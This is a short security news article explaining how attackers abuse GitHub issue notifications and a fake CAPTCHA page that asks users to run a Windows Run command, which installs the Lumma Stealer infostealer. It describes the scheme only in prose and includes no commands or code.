Hackers Exploit GitHub Notifications to Spread Malware

By Ava McKinneyOnline Safety

Hackers Exploit GitHub Notifications to Spread Malware

Malware distributors have adopted a new method to send malicious emails on behalf of the GitHub Security Team. This technique leverages legitimate email servers from the platform to send messages disguised as official security notifications. By targeting developers and project maintainers on GitHub, attackers aim to infiltrate their systems with malware.

How the Attack Works

The attack begins when hackers create an issue in the targeted project’s GitHub repository, crafting the message to look like it comes from the GitHub Security Team. Immediately after posting, the issue is deleted, but a notification about it is automatically sent to the project developer via email. These notifications are indistinguishable from genuine GitHub messages, making them particularly dangerous.

The email urges the recipient to visit a fake website for more information. On this site, users are prompted to complete a verification process, supposedly to prove they are not a robot, which involves pressing certain key combinations to execute a command on their system. Following these instructions results in the download and execution of malware called LUMMASTEALER. This malware steals sensitive user data, including access keys, cryptocurrency wallets, passwords, and browser session data.

The Role of GitHub Notifications

GitHub notifications are central to this attack. Since the emails originate from real servers, they can bypass many phishing detection systems. Attackers manipulate the content to create the illusion of an official request, leading many developers to follow the instructions and inadvertently infect their systems.

Another issue lies in how GitHub structures its notifications. The emails often lack enough detail to give recipients a clear understanding of the situation, allowing hackers to set their own context and making phishing attempts harder to detect. GitHub has already received reports about this attack method, and there are suggestions to improve their notification system to reduce the risk of similar incidents.

Fake CAPTCHA and Malware Installation

The second part of the attack involves a fake CAPTCHA page. Instead of the usual image selection or standard tasks, users are asked to run a command through the Windows Run dialog, which ultimately launches the malicious software. This malware downloads a file disguised as a system application, which is then executed on the victim’s computer.

Leave a Reply